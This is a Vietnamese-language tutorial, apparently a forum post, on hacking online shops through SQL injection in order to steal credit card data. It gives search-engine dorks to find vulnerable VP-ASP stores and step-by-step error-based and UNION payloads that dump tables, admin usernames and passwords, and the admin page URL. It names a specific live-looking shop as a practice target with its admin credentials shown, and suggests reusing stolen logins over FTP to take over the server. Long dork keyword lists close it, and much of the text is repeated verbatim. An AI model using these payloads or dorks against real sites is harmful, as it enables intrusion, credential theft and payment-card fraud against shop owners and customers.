Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở http://www.google.com/ hoặc http://www.search.com/ Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id="hoặc search theo domain allinurl:”.com/shopdisplayproducts.asp?id= "bạn có thể thay .com bằng .net,.biz ,.us.....vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9"
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ' .
http://www.victim.com/shopping/shopdisplay...asp?id=153'
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem http://www.victim.com/shopping/shopdisplay...sp?cat=153'
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi. Bạn nhìn kỹ nhé -----> Unclosed quotation mark before the character string đối với lỗi này ta sẽ dùng and 1=convert , Còn nếu nó báo thế này
CODE
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467
Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
bạn xoá dấu ' rồi thêm dòng query này vào phía sau
ta được như thế này
http://www.victim.com/shopping/shopd...from%20informa tion_schema.tables))--sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả 'ver_Faq' là tên của table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Ta cứ lấy tiếp như vậy :
http://www.victim.com/shopping/shopd...%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons')))--sp_password
Bước II : lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers..........Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...cts.asp?id=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto'))) --sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo :and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto','f ldusername')))--sp_password
Trích
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Ok được rồi, giờ ta lấy username và password :
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> username là admin
_Lấy password :
and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column 'fldpassword' mà không biết nó ở đâu .Ta thử search tại Table đầu tiên 'ver_Faq'
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25pass%25')))--sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ "pass"
Trích :
No products match your search
Oh vậy là table 'ver_Faq' ko có column nào mà tên của nó có chứa chữ "pass" .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III:
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
http://www.victim.com/shopping/shopd...cts.asp?id=153
Thì link admin có thể nằm ở
http://www.victim.com/shopping/shopadmin.asp Hoặc http://www.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Hack các shop jetdatabase
Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
http://www.treasureshidden.com/shopp...ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn '
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
ok báo lỗi rồi
9' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé -----------> Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ' nhé )
Câu lệnh như sau :
union select 1 from tbluser"having 1=1--sp_password
----> http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
-------------%--------------chú thích-------------%----------------
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ' xem sao
-------------------------------------------------------------------------------------
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2 from tbluser"having 1=1--sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5 from tbluser"having 1=1--sp_password
.......................
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
18Please review these other products:
----------------------------Chú thích-----------------------------
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 -------> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 -----> thêm đến47
line 468 ------> thêm 47
line 469 -------> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ......( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
-------------------------------------------------------------------------
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
18Please review these other products:
-------------------------------
harvey
click to see moreboha216322
18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser"having 1=1--sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://www.treasureshidden.com/shopping/shopadmin.asp
http://www.treasureshidden.com/shopping/shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration"having 1=1--sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
-------------<%>-------------<%>------------------------------------------
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20"table"%27
"union select 1 from "table"'
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........
sơ bộ vậy thôi.......( các pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được......trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả.....vậy phải làm sao đây.....
uh. vậy là nó đã fix!bó tay sao.......không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 --> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy..........hixhix....khó rồi đây........bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta...ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname='xadminpage'
------>shoptellafriend.asp?id=1 union select fieldname='xadminpage',2,fieldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration'
ở file shopexd.asp cũng như vậy....
----------------------<%>---------------<%>-----------------------
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu "may mắn" (<----lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ' hoặc xoá nó đi khi ta query.........
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:"vp-asp shopping" inurl :".asp?id="
intext:"products" inurl:".asp?id="
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó...chúc may mắn ()
Hack vui vẻ nha
http://www.treasureshidden.com/shopp...ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn '
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
ok báo lỗi rồi
9' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé -----------> Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ' nhé )
Câu lệnh như sau :
union select 1 from tbluser"having 1=1--sp_password
----> http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
-------------%--------------chú thích-------------%----------------
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ' xem sao
-------------------------------------------------------------------------------------
Tiếp tục nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1 from tbluser"having 1=1--sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2 from tbluser"having 1=1--sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4 from tbluser"having 1=1--sp_password
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5 from tbluser"having 1=1--sp_password
.......................
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422
18Please review these other products:
----------------------------Chú thích-----------------------------
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 -------> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 -----> thêm đến47
line 468 ------> thêm 47
line 469 -------> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ......( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
-------------------------------------------------------------------------
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh....asp?cat=9' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22
18Please review these other products:
-------------------------------
harvey
click to see moreboha216322
18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more
Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser"having 1=1--sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh....asp?cat=9'
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://www.treasureshidden.com/shopping/shopadmin.asp
http://www.treasureshidden.com/shopping/shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration"having 1=1--sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
-------------<%>-------------<%>------------------------------------------
Ngoài ra tôi xin trích thêm bài của lão vietcuongconan ( tôi thường làm theo kiểu này )
shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20"table"%27
"union select 1 from "table"'
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........
sơ bộ vậy thôi.......( các pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được......trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả.....vậy phải làm sao đây.....
uh. vậy là nó đã fix!bó tay sao.......không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 --> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27
nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy..........hixhix....khó rồi đây........bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta...ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname='xadminpage'
------>shoptellafriend.asp?id=1 union select fieldname='xadminpage',2,fieldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration'
ở file shopexd.asp cũng như vậy....
----------------------<%>---------------<%>-----------------------
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu "may mắn" (<----lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ' hoặc xoá nó đi khi ta query.........
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:"vp-asp shopping" inurl :".asp?id="
intext:"products" inurl:".asp?id="
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó...chúc may mắn ()
Hack vui vẻ nha
Keys hack shop
KeyWorld hack shop CFM Part ( 8 )
.cfm?inc=1
.asp?contentID=1
.asp?logon=1
.asp?nid=1
orderinfo.asp?t=
cat_e.asp?N=1
.asp?ShopID=1good1
product.asp?sku=1
.asp?brandid=1
.asp?category=1
onlineCourse.asp?tID=
viewCategories.asp?idCategory=
.asp?idpage=
/shippinginfo.asp?lang=
.asp?Job_DID=
.asp?shopCode=1
product.asp?NODE_ID=
.asp?iPro=1
.asp?unacrocieramsc_id=
.asp?PND=1
,asp?c_ID=1
.asp?SValue=
.asp?tabid=
.cfm?shopping=1
DepartmentID=1
displayproducts=
.cfm?DomainID=
cityid=1
produktID=
traderid=1
shopperID=1
.cfm?passid=1
CatCode=1
.asp?scatid=1
CatName=1
CONTAINERID=
maincatid=
SKU_ID=1
subcatID=
.cfm?pagepkid=
manufacturersID=1
CFTOKEN=1
t.cfm?CFID=1
.cfm?Product_ID=1
.cfm?ProductCategory_ID=4
product_configuration_id=1
KeyWorld hack shop CFM Part ( 7 )
.asp?mscssid=1
l.asp?zone=
.asp?bei=1
.asp?redirectUrl=
.asp?catalog_name=
.cfm?xcode=1
.cfm?tlcatid=1
.asp?Post_ID=1
.asp?subcode=1
.asp?originID=
.asp?class_id=1
.asp?fScope=1
.asp?DriveID=1
.asp?AK=
.asp?XnID=
.asp?CpID=1
.asp?categ=
.asp?gen=
.asp?WebsiteID=
.asp?GroupID=1
asp?artistORD=
.asp?locationid=
.asp?idCategory=
.asp?TITEL=
.asp?FileID=
asp?IDLoja=
.asp?cadena=1
.cfm?pagina=
.cfm?palabras=
.cfm?id_ficha=
.cfm?pal_clave_rel=
.cfm?id_ficha=
.cfm?method=
asp?popsearch=
.cfm?indice=
.cfm?titulart_p=
asp?Lastname=
.asp?id_producto=1
.asp?Cadena=
.asp?comobo=
.cfm?categoryoid=1
.asp?ByBrand=1
.asp?newlang=
.asp?scat_code=1
l.asp?iPid=1
.asp?locationid=
.asp?StockID=4
.asp?idMainCategory=
t.asp?rand=
.asp?dept_id=1
.asp?t_date=1
.cfm?suppress_hdr=
.cfm?BRD=1
.cfm?top_id=
.cfm?datepub=
.cfm?site_id=
KeyWorld hack shop CFM Part ( 6 )
.asp?mygrp=1
.asp?ad_bn=1
.cfm?login_name=
.cfm?nPageNumber=
.cfm?videoid=1
asp?ProductCode=
/dvd.cfm?itemid=
asp?sorgid=
.asp?stato=
.asp?goods=
.cfm?info=
.asp?number
.cfm?cont=
.asp?Ph=
